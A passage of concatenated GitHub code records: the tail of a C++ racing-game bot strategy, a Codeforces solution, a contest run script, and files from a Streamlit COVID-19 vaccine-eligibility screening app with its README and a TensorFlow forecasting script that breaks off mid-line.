wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\n )\n ti = wp[++waypointIndex][0],\n tj = wp[waypointIndex][1];\n if (waypointIndex + 1 < int(wp.size()))\n fi = wp[waypointIndex + 1][0],\n fj = wp[waypointIndex + 1][1];\n }\n double targetX = (ti + 0.5) * tileSize;\n double targetY = (tj + 0.5) * tileSize;\n int si = self.getX() / tileSize;\n int sj = self.getY() / tileSize;\n int n = a.size();\n int m = a[0].size();\n auto ok = [&](int x, int N)\n {\n return x >= 0 && x < N;\n };\n\n auto getPath = [&](int si, int sj, int ti, int tj)\n {\n vector<vector<int>> d(n, vector<int>(m, 10000));\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\n d[si][sj] = 0;\n queue<pair<int, int>> q;\n q.push({si, sj});\n while (q.size())\n {\n int u = q.front().first;\n int v = q.front().second;\n q.pop();\n if (u == ti && v == tj)\n {\n vector<pair<int, int>> path;\n pair<int, int> start = {si, sj};\n while (u != start.first || v != start.second)\n path.push_back({u, v}),\n tie(u, v) = prev[u][v];\n path.push_back(start);\n reverse(path.begin(), path.end());\n return path;\n }\n for (int i = 0; i < 4; ++i)\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] >= 0 && dir[a[u][v]][i])\n if (d[u + dx[i]][v + dy[i]] == 10000)\n d[u + dx[i]][v + dy[i]] = d[u][v] + 1,\n prev[u + dx[i]][v + dy[i]] = {u, v},\n q.push({u + dx[i], v + dy[i]});\n }\n return vector<pair<int, int>>(0);\n };\n vector<pair<int, int>> path = getPath(si, sj, ti, tj);\n for (int i = 1; i < int(path.size()) - 1; ++i)\n if (abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1)\n {\n#ifdef debug\n if (debug)\n {\n vector<string> xxx(m);\n for (int i = 0; i < m; ++i)\n for (int j = 0; j < n; ++j)\n xxx[i].push_back('.');\n for (int i = 0; i < path.size(); ++i)\n xxx[path[i].second][path[i].first] = i + 48;\n xxx[sj][si] = 'S';\n xxx[path[i].second][path[i].first] = 'X';\n xxx[tj][ti] = 'F';\n //ppp(d);\n writeln();\n writeln(xxx);\n writeln();\n }\n#endif\n fi = ti;\n fj = tj;\n tie(ti, tj) = path[i];\n targetX = (path[i].first + 0.5) * tileSize;\n targetY = (path[i].second + 0.5) * tileSize;\n break;\n }\n if (path.size() >= 2)\n {\n int ai, aj, bi, bj, ci, cj;\n tie(ai, aj) = path[0];\n tie(bi, bj) = path[1];\n tie(ci, cj) = path[2];\n if (ai + 1 == ci && aj - 1 == cj)\n /* /\n / */\n {\n if (ai == bi)\n targetX = ci * tileSize,\n targetY = (bj + 0.5) * tileSize;\n else\n targetX = (ci + 0.5) * tileSize,\n targetY = bj * tileSize;\n snake = true;\n }\n else\n snake = false;\n }\n else\n snake = false;\n path = getPath(si, sj, ti, tj);\n if (path.size() >= 2)\n pi = path[path.size() - 2].first,\n pj = path[path.size() - 2].second;\n else\n pi = -100500,\n pj = -100500;\n double temp = self.getDistanceTo(targetX, targetY);\n double temp2 = temp / tileSize;\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\n prevDistance = distToNext;\n distToNext = temp;\n auto interpolationBigModule = [&](double x)\n {\n\t\tif (x > FAR_FAR_AWAY)\n\t\t return FAR_FAR_AWAY_VALUE;\n\t\tif (x < SO_CLOSE)\n\t\t return SO_CLOSE_VALUE;\n return 3.4 - 4.05 * pow(x, 1) + 1.1 * pow(x, 2);\n return 0.05 + 0.775 * pow(x, 1) - 0.6 * pow(x, 2) + 0.1 * pow(x, 3);\n return 2.38 - 11.404 * pow(x, 1) + 23.4 * pow(x, 2) - 22.24 * pow(x, 3) + 9.6 * pow(x, 4) - 1.536 * pow(x, 5) - pow(5.329070518200751, -15) * pow(x, 6);\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1) + 0.2; //на скорости влезает, но задевает угол ~-2\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\n };\n\tauto interpolationSmallModule = [&](double x)\n\t{\n\t\tif (x > 2)\n\t\t return -0.25;\n\t\tif (x < 0.5)\n\t\t return 0.3;\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\n\t};\n double MAAAAAGIC = interpolationBigModule(temp2);\n double nextWaypointX = targetX;\n double nextWaypointY = targetY;\n\n double cornerTileOffset = MAAAAAGIC * tileSize;\n //cout << temp / tileSize << \" \" << MAAAAAGIC << \" \" << cornerTileOffset << \"\\n\";\n auto pathtitj = getPath(ti, tj, fi, fj);\n if (pathtitj.size() >= 2)\n fi = pathtitj[1].first,\n fj = pathtitj[1].second;\n else\n fi = ti,\n fj = tj;\n //cout << si << \" \" << sj << \" \" << pi << \" \" << pj << \" \" << ti << \" \" << tj << \" \" << fi << \" \"<< fj << \"\\n\";\n#ifdef debug\n writeln(si, sj, pi, pj, ti, tj, fi, fj);\n writeln(pathtitj);\n writeln();\n#endif\n auto changeCoords = [&](int i, int j) {\n if (snake)\n return;\n if (pj == tj)\n swap(pi, fi),\n swap(pj, fj);\n switch (TEMP[i][j]) \n {\n case LEFT_TOP_CORNER:\nlt:\n TEMP[i][j] = LEFT_TOP_CORNER;\n nextWaypointX += cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case RIGHT_TOP_CORNER:\nrt:\n TEMP[i][j] = RIGHT_TOP_CORNER;\n nextWaypointX -= cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case LEFT_BOTTOM_CORNER:\nlb:\n TEMP[i][j] = LEFT_BOTTOM_CORNER;\n nextWaypointX += cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case RIGHT_BOTTOM_CORNER:\nrb:\n TEMP[i][j] = RIGHT_BOTTOM_CORNER;\n nextWaypointX -= cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case TOP_HEADED_T:\nth:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rb, lb);\n break;\n case BOTTOM_HEADED_T:\nbh:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rt, lt);\n break;\n case RIGHT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, lb, lt);\n break;\n case LEFT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, rb, rt);\n break;\n case CROSSROADS:\n cout << si << \" \" << sj << \" \" << pi << \" \" << pj << \" \" << ti << \" \" << tj << \" \" << fi << \" \"<< fj << \"\\n\";\n cout << \"CROSSROADS\\n\";\n if (pi == ti && pi == fi);\n else if (pj == tj && pj == fj);\n else go(pj + 1 == tj, th, bh);\n default:\n break;\n }\n //ppp(TEMP);\n //cout << \"\\n\";\n };\n changeCoords(ti, tj);\n //cout << targetX << \" \" << targetY << \"\\n\";\n //cout << nextWaypointX << \" \" << nextWaypointY << \"\\n\\n\";\n\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\n auto getTurn = [&](double d)\n {\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\n };\n\n if (forceBack)\n {\n forceBack--;\n if (forceBack == 0)\n {\n power *= -1;\n forceRight = FORCE_RIGHT;\n turn *= -1;\n }\n }\n\n else if (forceRight)\n {\n if (forceRight > FORCE_RIGHT - BREAK)\n move.setBrake(true);\n forceRight--;\n if (forceRight == 0)\n force = FORCE;\n } \n if (!forceBack && forceRight == 0)\n {\n if (changed && fabs(prevDistance - distToNext) < eps)\n {\n countOfFails++;\n {\n if (countOfFails > COUNT_OF_FAILS)\n {\n globalFail++;\n countOfFails = 0;\n forceBack = FORCE_BACK;\n turn = getTurn(32);\n if (isCorner(a[si][sj]))\n {\n //cout << \"CORNER\";\n turn = turn > 0 ? 1 : -1;\n if (globalFail > GLOBAL_FAIL)\n //cout << \"GLOBAL_FAIL\",\n turn *= -1;\n }\n else\n if (globalFail > GLOBAL_FAIL)\n //cout << \"NOT CORNER GLOBAL_FAIL\",\n turn = turn > 0 ? 1 : -1;\n turn *= -1;\n power *= -1;\n }\n }\n //else\n //if (countOfFails > COUNT_OF_FAILS / 5)\n //{\n //forceRight = 0;\n //force = 0;\n //countOfFails = COUNT_OF_FAILS;\n //}\n }\n else\n {\n if (force)\n force--;\n if (forceSlow)\n forceSlow--;\n countOfFails = 0;\n globalFail = 0;\n\n if (forceRight == 0)\n turn = getTurn(36);\n //if (speedModule * speedModule * fabs(angleToWaypoint) > 6 * PI && distToNext < DIST_TO_NEXT || \n double dd = speedModule / MAX_SPEED;// * 1.1;\n //cout << dd << \" \" << distToNext << \"\\n\";\n //if (dd > 1)\n //dd = 6;\n if ((distToNext < tileSize * dd && distToNext > tileSize) || forceSlow)\n move.setBrake(true);\n power = 1.0;\n }\n }\n //else\n //if (changed && fabs(prevDistance - distToNext) < eps)\n //{\n //countOfFails++;\n //if (countOfFails > COUNT_OF_FAILS / 3)\n //forceRight = FORCE_RIGHT;\n //}\n //else\n //countOfFails = 0;\n move.setWheelTurn(turn);\n move.setEnginePower(power);\n for (auto car : world.getCars())\n if (!car.isTeammate())\n {\n //cout << self.getAngleTo(car) / PI * 180 << \"\\n\";\n if (self.getDistanceTo(car) <= tileSize)\n {\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\n move.setThrowProjectile(true);\n if (self.getAngleTo(car) + ANGLE_THROW * 2 > PI || self.getAngleTo(car) - ANGLE_THROW * 2 < -PI)\n move.setSpillOil(true);\n }\n }\n if (world.getTick() > 210 && distToNext > prevDistance)\n {\n forceSlow = FORCE_SLOW_DOWN;\n if (distToNext > tileSize * 5)\n forceSlow /= 2;\n }\n if (self.getRemainingOiledTicks() > 0)\n forceSlow = 0;\n if (world.getTick() > 210 && (distToNext > prevDistance && distToNext > tileSize * 5))\n move.setUseNitro(true);\n if (world.getTick() == 140)\n move.setUseNitro(true);\n}\n\nMyStrategy::MyStrategy() \n{\n dir[1][1] = dir[1][3] = true;\n dir[2][0] = dir[2][2] = true;\n\n dir[3][0] = dir[3][1] = true;\n dir[4][1] = dir[4][2] = true;\n dir[5][0] = dir[5][3] = true;\n dir[6][2] = dir[6][3] = true;\n\n dir[7][1] = dir[7][2] = dir[7][3] = true;\n dir[8][0] = dir[8][1] = dir[8][3] = true;\n dir[9][0] = dir[9][2] = dir[9][3] = true;\n dir[10][0] = dir[10][1] = dir[10][2] = true;\n\n dir[CROSSROADS][0] = dir[11][1] = dir[11][2] = dir[11][3] = true;\n freopen(\"lol\", \"w\", stdout);\n}\n\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})\n//import re\n//print(re.sub(r'x\\^(\\d+)', r'pow(x, \\1)', re.sub(r'(\\d+) x', r'\\1 * x', input().replace(' x ', ' x^1 '))))\n" }, { "alpha_fraction": 0.3368421196937561, "alphanum_fraction": 0.5754386186599731, "avg_line_length": 14, "blob_id": "b8b71b611165fe9a80cec0718866dfaf6c8610b1", "content_id": "01ca9dfc06dffabd781fae9d433c52ebf0a5e5b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 16, "num_lines": 19, "path": "/CodeForce/1663/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "r = int(input())\nif r < 1200:\n print(1200)\nelif r < 1400:\n print(1400)\nelif r < 1600:\n print(1600)\nelif r < 1900:\n print(1900)\nelif r < 2100:\n print(2100)\nelif r < 2300:\n print(2300)\nelif r < 2400:\n print(2400)\nelif r < 2600:\n print(2600)\nelse:\n print(3000)\n" }, { "alpha_fraction": 0.49921995401382446, "alphanum_fraction": 0.5304211974143982, "avg_line_length": 44.71428680419922, "blob_id": "1f4cc8dd9d6003670694f7b290de98652f195f75", "content_id": "c87ce368eb7cc96ff08d7eab12ab0350bfcf41b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 641, "license_type": "no_license", "max_line_length": 84, "num_lines": 14, "path": "/2022/ghc/run.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "./A < ./b_better_start_small.in.txt > B.out\necho -e \"$(cat B.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat B.out)\" > B.out2\n\n./A < ./c_collaboration.in.txt > C.out\necho -e \"$(cat C.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat C.out)\" > C.out2\n\n./A < ./d_dense_schedule.in.txt > D.out\necho -e \"$(cat D.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat D.out)\" > D.out2\n\n./A < ./e_exceptional_skills.in.txt > E.out\necho -e \"$(cat E.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat E.out)\" > E.out2\n\n./A < ./f_find_great_mentors.in.txt > F.out\necho -e \"$(cat F.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat F.out)\" > F.out2\n\n" }, { "alpha_fraction": 0.4691357910633087, "alphanum_fraction": 0.5925925970077515, "avg_line_length": 39.5, "blob_id": "85f1542bde57a53cc04d0b352c33eb3e5f5bfb48", "content_id": "786dd048711d3c37b970a66d7d7a09131e7a0554", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 65, "num_lines": 2, "path": "/CodeForce/0552/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=int(input())\nprint(sum(i*max(0,min(10**i,n+1)-10**(i-1))for i in range(1,11)))\n" } ]
487
roynozoa/Screening-apps
https://github.com/roynozoa/Screening-apps
4939d5ecd0a265cfdd07c6d6395e9dd6a7700635
9fa35dcef0762a4c3082d8b7de6e518306828a56
4834a120afb066367d0954b89a955fbe0f7d688e
refs/heads/master
2023-05-09T18:02:29.552314
2021-06-14T09:02:08
2021-06-14T09:02:08
364,173,633
0
0
null
2021-05-04T07:23:37
2021-05-04T07:24:48
2021-05-04T07:26:35
null
[ { "alpha_fraction": 0.6228548288345337, "alphanum_fraction": 0.6371895670890808, "avg_line_length": 32.92465591430664, "blob_id": "be1eea781e9bf45912969d3ac30801a2227b5a6f", "content_id": "f82d66ef26482f4fd90744d66f27baa2be324f30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4953, "license_type": "permissive", "max_line_length": 141, "num_lines": 146, "path": "/app/app.py", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "# Screening Apps Application\n# Streamlit implementation\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport shap\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nst.set_option('deprecation.showPyplotGlobalUse', False)\nst.write(\"\"\"\n# COVID-19 Screening-apps\n\nThis app predicts the **COVID-19 Vaccination** Screening !!!\n\n\n\n\"\"\")\n\n# Loads dataset\ndata_df = pd.read_csv('data.csv')\ndata_df = data_df.iloc[:, 0:14]\n\n# get vaccination info\ntime_data = pd.read_csv('https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/vaccinations/country_data/Indonesia.csv')\ntime_data.drop(columns=['source_url'], inplace=True)\ntime_data['date'] = pd.to_datetime(time_data['date'])\ntime_data.set_index('date', inplace=True)\ntime_data.drop(columns=['location', 'vaccine', 'total_vaccinations'], inplace=True)\nlatest_date = time_data.index[-1]\n\nst.sidebar.header('User Input Features')\n\ndef user_input_features():\n terpapar = st.sidebar.selectbox('Pernah Terpapar COVID/positif dalam 3 bulan',('Yes','No'))\n u18 = st.sidebar.selectbox('Berusia kurang dari 18 tahun',('Yes','No'))\n mengandung = st.sidebar.selectbox('Ibu yang sedang mengandung',('Yes','No'))\n tekanandarah = st.sidebar.selectbox('Tekanan darah anda saat ini diatas 180/110 mmHg',('Yes','No'))\n menyusui = st.sidebar.selectbox('Ibu yang sedang menyusui',('Yes','No'))\n penyakit = st.sidebar.selectbox('Mengidap salah satu penyakit ini ( PPOK, Asma, Jantung, Gangguan Ginjal, penyakit hati)',('Yes','No'))\n alergi = st.sidebar.selectbox('Memiliki riwayat alergi terhadap vaksin',('Yes','No'))\n terapi = st.sidebar.selectbox('Sedang menjalani terapi kanker',('Yes','No'))\n autoimun = st.sidebar.selectbox('Mengidap penyakit autoimun sistemik',('Yes','No'))\n pembekuan = st.sidebar.selectbox('Mengidap gangguan pembekuan darah, defisiensi imun, atau penerima produk darah/transfusi',('Yes','No'))\n epilepsi = st.sidebar.selectbox('Mengidap penyakit epilepsi/ayan',('Yes','No'))\n vaksinlain = st.sidebar.selectbox('Mendapat vaksin lain(selain COVID) selama 1 bulan terakhir',('Yes','No'))\n hivaids = st.sidebar.selectbox('Mendiap HIV-AIDS',('Yes','No'))\n diatas60 = st.sidebar.selectbox('Berusia 60 tahun keatas',('Yes','No'))\n\n data = {'terpapar': terpapar,\n 'u18': u18,\n 'mengandung': mengandung,\n 'tekanandarah': tekanandarah,\n 'menyusui': menyusui,\n 'penyakit': penyakit,\n 'alergi': alergi,\n 'terapi': terapi,\n 'autoimun': autoimun,\n 'pembekuan': pembekuan,\n 'epilepsi': epilepsi,\n 'vaksinlain': vaksinlain,\n 'hivaids': hivaids,\n 'diatas60': diatas60}\n\n features = pd.DataFrame(data, index=[0])\n \n data_cleanup = {'terpapar': {'Yes':1, 'No':0},\n 'u18': {'Yes':1, 'No':0},\n 'mengandung': {'Yes':1, 'No':0},\n 'tekanandarah': {'Yes':1, 'No':0},\n 'menyusui': {'Yes':1, 'No':0},\n 'penyakit': {'Yes':1, 'No':0},\n 'alergi': {'Yes':1, 'No':0},\n 'terapi': {'Yes':1, 'No':0},\n 'autoimun': {'Yes':1, 'No':0},\n 'pembekuan': {'Yes':1, 'No':0},\n 'epilepsi': {'Yes':1, 'No':0},\n 'vaksinlain': {'Yes':1, 'No':0},\n 'hivaids': {'Yes':1, 'No':0},\n 'diatas60': {'Yes':1, 'No':0}}\n\n features = features.replace(data_cleanup)\n return features\n\ninput_df = user_input_features()\n\n\n# Reads in saved classification model\nload_clf = pickle.load(open('clf.pkl', 'rb'))\n\n# Apply model to make predictions\nprediction = load_clf.predict(input_df)\nprediction_proba = load_clf.predict_proba(input_df)\n\n\nst.header('Prediction')\n\nvaccine = np.array(['Belum Bisa Divaksin', 'Bisa Divaksin'])\nst.write(vaccine[prediction])\n\nst.subheader('Prediction Probability')\nst.write(prediction_proba)\n\nst.write('---')\nst.header('Vaccination Data in Indonesia')\nst.write(f'Latest update {latest_date.strftime(\"%A, %d %B %Y\")}')\nst.write('''\nData source from [Our World in data](https://ourworldindata.org/coronavirus-source-data)\n\n''')\n\nst.line_chart(time_data)\n# explainer = shap.TreeExplainer(load_clf)\n# shap_values = explainer.shap_values(data_df)\n\n# st.header('Feature Importance')\n# plt.title('Feature Importance for COVID-19 Vaccine Screening')\n\n\n\n# plt.title('Feature importance based on SHAP values (Bar)')\n# shap.summary_plot(shap_values, data_df, plot_type=\"bar\")\n# st.pyplot()\n\nst.write('---')\n\nst.write('''\nFor mor information about COVID-19 Vaccine in Indonesia please check Vaccine Dashboard from Kementerian Kesehatan RI\n[link](https://vaksin.kemkes.go.id/#/vaccines) \n\n''')\n\nst.write('---')\n\n\n\nst.write(\"\"\"\n### Our Team :\n- Muhammad Adisatriyo Pratama\n- Stefannov\n- Surya Asmoro\n\n\"\"\")\n" }, { "alpha_fraction": 0.7012020349502563, "alphanum_fraction": 0.7309673428535461, "avg_line_length": 25.082090377807617, "blob_id": "36fea2708871afe722d292c774c10a2ece1a4571", "content_id": "2b303849d084082ce3aaa17f2cafbcfeba6689d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3494, "license_type": "permissive", "max_line_length": 214, "num_lines": 134, "path": "/README.md", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "# Screening-apps\nAplikasi yang dapat menentukan apakah seseorang boleh mendapatkan vaksin COVID-19 atau belum berdasarkan data riwayat penyakit.\n\nMata Kuliah Manajemen Proyek TI - 2021\nOleh:\n- Stefannov\n- M. Adisatriyo Pratama\n- Surya Asmoro\n\n## Deskripsi Projek\n- Aplikasi yang dapat menentukan apakah seseorang\nboleh mendapatkan vaksin COVID-19 atau belum\nberdasarkan data riwayat penyakit.\n- Aplikasi berbentuk web yang dapat diakses melalui\ninternet.\n- Aplikasi ini menerapkan metode Machine Learning\n\n\n## Team Members and Roles\n- Muhammad Adisatriyo P :\n - Project Management\n - Build ML model\n- Surya Asmoro:\n - Gather Data\n - Cleaning Data\n - Software Testing\n- Stefannov:\n - Gather Data\n - Cleaning Data\n - Software Testing\n\n\n## Background Problem\n\nOur goal for creating this project is to help the process of COVID-19 vaccine distribution faster so that we can reach the minimum 70% of total population to achieve national herd immunity for COVID-19.\n\n## Tools\n- Python3\n- Jupyter Notebook and Google Colab\n- Scikit-Learn\n- Google Docs\n- Github\n- Streamlit Framework\n- Google Cloud Platform\n\n## Machine Learning Model\n\nOur problem is really simple binary Classification with just using decision tree classifier as our main algorithm and several parameters that is provided from scikit-learn can easily reach up to ~99% test accuracy.\n\n### here is the sample code\n\n#### first let's split our dataset into training and testing\n\n```\nfrom sklearn.model_selection import train_test_split\n\n# split data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42)\n\n```\n#### Initialize model algorithm\n\n```\n# import library\nfrom sklearn.tree import DecisionTreeClassifier\n\n# model initialize with max_depth = 2\ndt = DecisionTreeClassifier(max_depth=2, random_state=42)\n```\n\n#### with that algorithm can have up to ~90% accuracy\n```\nfrom sklearn.metrics import accuracy_score\n\n# fit training set\ndt.fit(X_train, y_train)\n\n# predict test set\ny_pred = dt.predict(X_test)\n\n# accuracy score\naccuracy_score(y_test, y_pred)\n```\n#### output\n```\n0.9180327868852459\n```\n\n#### using GridSearchCV for searching best hyperparameter\n```\n# Import library\nfrom sklearn.model_selection import GridSearchCV\n\n## hyperparameter\nparams_dt = {'max_depth':[1,2,3,4,6,8,10], 'min_samples_leaf':[0.0001, 0.001, 0.05, 0.1, 0.2], 'criterion':['gini', 'entropy']}\n\n# performs GridSearchCV\ngrid_dt = GridSearchCV(estimator=dt, param_grid=params_dt, scoring='roc_auc', cv=5, n_jobs=1)\n\n# fit data\ngrid_dt.fit(X_train, y_train)\n\nprint(f'Best Parameters : {grid_dt.best_params_}')\nprint(f'Best Score : {grid_dt.best_score_}')\nprint(f'Best Estimator : {grid_dt.best_estimator_}')\n```\n\n#### The best score is up to ~99% accuracy\n#### output\n```\nBest Parameters : {'criterion': 'gini', 'max_depth': 8, 'min_samples_leaf': 0.0001}\nBest Score : 0.9989732930209121\nBest Estimator : DecisionTreeClassifier(max_depth=8, min_samples_leaf=0.0001, random_state=42)\n```\n\n#### Saving the best model using pickle\n```\nimport pickle\npickle.dump(grid_dt.best_estimator_, open('clf.pkl', 'wb'))\n```\n\n## Deployment\n\nWe are using Google Cloud Platform to quickly deploy our web app. We are using Google App Engine and fetch the data from GitHub repository to build the web app.\n\nHere is our web app URL: http://www.screening-apps.info/\n\n\n## Reference\n\n- Python Docs: https://docs.python.org/3/\n- Google Cloud Platform: https://cloud.google.com/\n- Streamlit: https://streamlit.io/\n- Scikit-learn: https://scikit-learn.org/" }, { "alpha_fraction": 0.8913043737411499, "alphanum_fraction": 0.8913043737411499, "avg_line_length": 6.833333492279053, "blob_id": "e0f317ffa1e978fd5b7322bf664c6e6d59182248", "content_id": "42b74dbb6c42f5593942e40e03b11dbf948eb530", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 46, "license_type": "permissive", "max_line_length": 10, "num_lines": 6, "path": "/app/requirements.txt", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "streamlit\npandas\nnumpy\nsklearn\nmatplotlib\nshap" }, { "alpha_fraction": 0.6743602752685547, "alphanum_fraction": 0.6865696310997009, "avg_line_length": 39.95205307006836, "blob_id": "560c6aa7a23f1545b36f9919d96f5679d14ff5f3", "content_id": "ee50bf9db72de05518d4bf907c640737068c9674", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5979, "license_type": "permissive", "max_line_length": 151, "num_lines": 146, "path": "/notebooks/build-timeseries.py", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "# import library\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport joblib\nimport tensorflow as tf\nimport os\n\nCWD = os.getcwd()\n\nHORIZON = 1 # predict next day\nWINDOW_SIZE = 4 # use worth of data\n\n\ndef update_data():\n data = pd.read_csv('https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/vaccinations/country_data/Indonesia.csv')\n data.drop(columns=['source_url'], inplace=True)\n data['date'] = pd.to_datetime(data['date'])\n data.set_index('date', inplace=True)\n data.total_vaccinations[-1]\n latest_date = data.index[-1]\n d = dict.fromkeys(data.select_dtypes(np.int64).columns, np.float32)\n data = data.astype(d)\n return data\n\ndef prepare_data():\n data = update_data()\n vacc_one = data.people_vaccinated.to_numpy()\n vacc_full = data.people_fully_vaccinated.to_numpy()\n timesteps = data.index.to_numpy()\n return vacc_one, vacc_full, timesteps\n\ndef create_next_timestep():\n data = update_data()\n last_timestep = data.index[-1]\n next_time_steps = get_future_dates(start_date=last_timestep, horizon=20)\n return next_time_steps\n\n\n\n\n# Create function to view NumPy arrays as windows \ndef make_windows(x, window_size=7, horizon=1):\n \"\"\"\n Turns a 1D array into a 2D array of sequential windows of window_size.\n \"\"\"\n # 1. Create a window of specific window_size (add the horizon on the end for later labelling)\n window_step = np.expand_dims(np.arange(window_size+horizon), axis=0)\n # print(f\"Window step:\\n {window_step}\")\n\n # 2. Create a 2D array of multiple window steps (minus 1 to account for 0 indexing)\n window_indexes = window_step + np.expand_dims(np.arange(len(x)-(window_size+horizon-1)), axis=0).T # create 2D array of windows of size window_size\n # print(f\"Window indexes:\\n {window_indexes[:3], window_indexes[-3:], window_indexes.shape}\")\n\n # 3. Index on the target array (time series) with 2D array of multiple window steps\n windowed_array = x[window_indexes]\n\n # 4. Get the labelled windows\n windows, labels = get_labelled_windows(windowed_array, horizon=horizon)\n\n return windows, labels\n\n# Make the train/test splits\ndef make_train_test_splits(windows, labels, test_split=0.2):\n \"\"\"\n Splits matching pairs of windows and labels into train and test splits.\n \"\"\"\n split_size = int(len(windows) * (1-test_split)) # this will default to 80% train/20% test\n train_windows = windows[:split_size]\n train_labels = labels[:split_size]\n test_windows = windows[split_size:]\n test_labels = labels[split_size:]\n return train_windows, test_windows, train_labels, test_labels\n\n# Create function to label windowed data\ndef get_labelled_windows(x, horizon=1):\n \"\"\"\n Creates labels for windowed dataset.\n\n E.g. if horizon=1 (default)\n Input: [1, 2, 3, 4, 5, 6] -> Output: ([1, 2, 3, 4, 5], [6])\n \"\"\"\n return x[:, :-horizon], x[:, -horizon:]\n\n\ndef get_future_dates(start_date, horizon=1, offset=1):\n \"\"\"\n Returns array of datetime values from ranging from start_date to start_date+horizon.\n\n start_date: date to start range (np.datetime64)\n horizon: number of day to add onto start date for range (int)\n offset: if offset=1 (default), original date is not included, if offset=0, original date is included\n \"\"\"\n return np.arange(start_date + np.timedelta64(offset, \"D\"), start_date + np.timedelta64(horizon+1, \"D\"), dtype=\"datetime64[D]\")\n\ndef predict_one():\n new_model = tf.keras.models.load_model(CWD + \"/notebooks/model_experiments/model_conv1D\")\n\n vacc_one, _, timesteps = prepare_data()\n full_windows, full_labels = make_windows(vacc_one, window_size=WINDOW_SIZE, horizon=HORIZON)\n train_windows, test_windows, train_labels, test_labels = make_train_test_splits(full_windows, full_labels)\n # Make predictions on the future\n\n # List for new preds\n future_forecast = []\n last_window = vacc_one[-WINDOW_SIZE:] # get the last window of the training data\n into_future = 20 # how far to predict into the future\n\n for i in range(into_future):\n # Make a pred for the last window, then append the prediction, append it again, append it again\n pred = new_model.predict(tf.expand_dims(last_window, axis=0))\n print(f\"Predicting on: \\n {last_window} -> Prediction: {tf.squeeze(pred).numpy()}\\n\")\n future_forecast.append(tf.squeeze(pred).numpy())\n # Update last window with new pred and get WINDOW_SIZE most recent preds (model was trained on WINDOW_SIZE windows)\n last_window = np.append(last_window, pred)[-WINDOW_SIZE:]\n \n return future_forecast\n\ndef predict_full():\n new_model = tf.keras.models.load_model(CWD + \"/notebooks/model_experiments/model_conv1Dfull\")\n _, vacc_full, timesteps = prepare_data()\n full_windows, full_labels = 